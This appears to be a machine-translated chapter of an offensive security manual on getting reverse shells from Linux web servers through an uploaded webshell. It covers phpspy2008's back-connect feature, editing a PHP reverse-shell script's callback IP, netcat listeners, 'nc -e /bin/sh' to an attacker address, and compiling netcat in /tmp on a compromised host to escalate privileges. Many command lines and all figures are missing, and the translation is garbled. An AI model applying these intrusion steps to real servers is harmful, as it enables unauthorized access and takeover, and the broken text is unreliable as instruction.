Tips for rebounding shell through webshell in Linux

13.2 tips for rebounding shell through webshell in Linux

In Linux, webshell is used to reverse the reverse shell. The application in the Process of website server intrusion and Elevation of Privilege is wider and more frequent than in windows.

The vast majority of Linux Elevation of Privilege relies on local exploit. Generally, webshell can execute commands, but overflow must be executed in an interactive environment. Otherwise, if it is executed directly in webshell, it cannot be exploited even if the overflow can be obtained successfully. Therefore, you must bounce a shell command line window and execute an overflow command on the command line terminal to raise the permission.

13.2.1 reverse shell using PHP webshell Trojan

In general, most PHP webshell Trojans and backdoors bring back a shell with the back connect function. For example, in the phpspy2008 Trojan Horse backdoor, there is a back connect rebound function, which can be used to obtain a shell command window that inherits the current webshell permission.

Before using the back connect rebound function, you must first use the NC Tool to locally listen to an unused port, for example, listening to the local port 8888, and execute the following command:

Then, on the back connect bounce connection page of webshell, the IP address of the local machine is automatically detected. The local IP address is displayed in "Your IP" and the listening port is entered in "your port, here is 8080. Then select the bounce connection method to be used. phpspy2008 provides two bounce Connection Methods: Perl and C. Perl rebound is used here (Fig. 403 ).

Fig 403

After setting, click "start" to send the shell window to the listening port. In the NC listening window, you can get a shell command line window (Figure 404 ).

Fig 404

In addition to phpspy2008, there are some dedicated PHP reverse shell web webshells. First, open the PHP bounce shell webshell file in the local text editor and find the following code:

Fig 405

Modify the bounce IP address 111.123.96.28 to the local IP address. The default bounce port is 8888, which can be modified (Figure 405 ). Save the modification and upload it through webshell. Assume that the uploaded link address is http: // www. ***. com/shell. php. Then open the Command Prompt window locally and execute the following command:

Use NC to monitor local port 8888. Access http: // www. ***. COM/shell. PHP, in the NC listening port, you can get a command line shell returned from the website server.

13.2.2 use NC to rebound Shell

During shell rebound, sometimes the server does not support PHP or webshell cannot successfully rebound the shell. For example, some servers only support JSP and PHP. In this case, you can also use the classic NC rebound shell method in windows.

When Rebounding the cmdshell in Windows, you must first run the "nc-VV-l-P port number" listening port on the local machine, then execute "nc-e cmd.exe listens to the Host IP address and port" in webshell, and a reverse shell can be rebounded. This method is still feasible in Linux, but requires a small change.

-- After listening to the port on the local machine, when the webshell runs the NC rebound, the message "/bin/sh”, not cmd.exe, in this way, a shell command line window in Linux can be sent to the listener host. For example, run the following command:

You can bounce a shell to port 8888 of the listening host with the IP address 119.1.44.32.

13.2.3 solution for remote hosts without NC tools

When you use the NC rebound shell, you may encounter a remote host where you cannot directly execute the NC or have not installed the NC tool. In this case, you can manually install an NC for the remote host. If the locally compiled program cannot be used on a remote host, you can directly upload the source code and compile it on the target machine.

If you need to compile NC on the target machine, you need to pay attention to some issues, because before obtaining the shell command line window, you can only execute the command in webshell. Generally, you can only execute one command at a time, then wait for the result to be displayed after execution.

In addition, you must pay attention to the program execution path during compilation. Due to the strict permission settings in Linux, even if attackers obtain webshell, they may not be able to directly write files in the web page Directory, you can only upload and write NC source files in folders such as/tmp (Figure 406 ).

Fig 406

For example, webshell in the/var/www/directory, then the default path to execute the command in webshell is/var/www/, if the Netcat source package is decompressed in the/tmp/netcat-0.7.1 folder, when compiling Netcat for the make operation, an error occurs during the make operation because the current path is/var/www/instead of/tmp/netcat-0.7.1. It is actually very easy to solve this problem. You can directly write the command "Switch path" and "make" into one sentence, separated by semicolons.

After the netcat-0.7.1 source file is uploaded to the writable Folder/tmp, the procedure and command of compiling NC in webshell is as follows:

Fig 407

After you run this command, you can extract the netcat-0.7.1 source file to the/tmp/netcat-0.7.1 directory (Figure 407 ). Then run the following command:

After the configuration is complete, run the following command to compile:

Because a semicolon is used, you can execute two commands at the same time. Make will be followed by the Directory switch command, and no error will be reported during compilation (Figure 408 ).

Fig 408

After the compilation is successful, you can enter the command to rebound shell, for example, the NC path is/tmp/netcat-0.7.1/NC, run the "nc-VV-l-P 8080" command locally to listen to port 8080, and then run the following command in webshell (Figure 409 ):

Fig 409

You can bounce back to the host in a shell command line window. Note that the Linux Shell that is rebounding does not have a $ prompt. Execute a sentence and return a sentence (Figure 410 ). In addition, the command/bin/sh is run in the reverse shell, and the command/bin/bash can be run in the reverse shell. However, the permission of/bin/sh is looser than that of/bin/bash, therefore, the success rate is higher.

Fig 410